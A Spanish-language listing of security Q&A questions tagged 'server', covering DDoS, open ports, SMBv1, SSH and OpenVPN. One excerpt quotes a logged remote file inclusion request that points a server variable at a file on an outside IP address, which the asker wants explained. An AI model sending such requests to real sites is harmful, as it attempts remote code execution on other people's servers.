Preguntas con etiqueta 'server'

preguntas con etiqueta
2
respuestas

Use la minería para evitar ataques DDOS en websocket: ¿Es esta una solución viable?

Estoy pensando si la siguiente forma es una buena manera de prevenir las ddos en mi servidor de forma completa y total. Mi idea es usar el mismo mecanismo de minería de criptomonedas (bitcoin, con sha256 o cualquier otro hash) para prevenir DDOS...
hecha 30.05.2018 - 04:26
2
respuestas

¿Qué servicios de puerto pueden usar los piratas para ingresar a un servidor?

Me estoy preparando para ejecutar mi primer servidor. Usaré ufw para deshabilitar todos los puertos excepto el puerto 22 para ssh y el puerto 80 para http . Aunque soy curioso. Supongamos que, en teoría, dejé todos los...
hecha 23.11.2014 - 20:58
1
respuesta

¿Qué hacer si aún tiene SMBv1 en ejecución en su red?

Estaba investigando el tráfico de la red en nuestra empresa mientras realizaba una auditoría de seguridad y descubrí que todavía tenemos un servidor que ejecuta SMBv1 en la red. El servidor es un controlador de dominio de Windows 2003 y tambi...
hecha 06.07.2017 - 23:04
3
respuestas

¿Se puede cifrar el correo electrónico antes de que llegue al servidor de correo? Si no, ¿hay algo que permitiría algo como esto en lo que se está trabajando?

Estaba pensando en alojar mi propio correo electrónico (propio servidor de correo electrónico) en lugar de usar Gmail. Pero luego me di cuenta de que nunca podría alojar mi correo electrónico en un servidor donde también hospedé Wordpress. Eso e...
hecha 02.01.2013 - 01:11
4
respuestas

¿Cuál es la mejor manera de asegurar la comunicación entre servidores para servidores en la nube?

Estoy buscando las mejores prácticas o sugerencias para proteger las comunicaciones entre servidores VPS. ¿Debo ejecutar todo el tráfico a través de SSH? ¿Qué pasa con el tráfico HTTP a través de algo como mongo? ¿Revertir el proxy en la m...
hecha 16.02.2014 - 17:41
3
respuestas

¿Ataque de raíz del servidor?

Alguien en Hungría intentó algo extraño recientemente: /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? Esta es la URL parcial de mi registro, que muestra la página a la que fueron. Dieron la URL de mi sitio como referente. ¿Qué...
hecha 06.04.2013 - 13:08
1
respuesta

¿La instalación de una Interfaz Gráfica de Usuario en un servidor será un problema de seguridad?

No soy un amante de la CLI, a veces prefiero hacer algunas tareas en un servidor usando una GUI en lugar de usar la CLI (acelera mi trabajo), pero no sé si instalar una GUI y acceder el uso de VNC y SSH comprometerá la seguridad del servidor.  ...
hecha 17.02.2016 - 00:21
1
respuesta

SSH y man-in-the-middle

Supongamos el siguiente escenario y corríjame si me equivoco en alguna parte: Hay un cliente y hay un servidor SSH al que el cliente se conecta. También hay un "hombre en el medio" (MIM) que puede interceptar el tráfico entrante y saliente de...
hecha 07.01.2018 - 09:24
1
respuesta

¿Quién es el Guardián de la Puerta?

Si usa seguridad básica bajo una conexión SSL (https), no es cierto que el servidor coincida con la combinación de usuario / contraseña, pero ¿qué sucede después de eso? ¿Qué impide que el navegador acceda al servidor? ¿El navegador entra en un...
hecha 20.05.2017 - 08:23
1
respuesta

OpenVPN: ¿Ubicación de almacenamiento y creación de claves / certificados?

Estoy reconfigurando alguna infraestructura OpenVPN para que sea más segura que la original y quería una guía. Se observa que la mejor política de seguridad es mantener a la Autoridad de certificación (CA) fuera de línea y separada del servid...
hecha 07.09.2014 - 23:17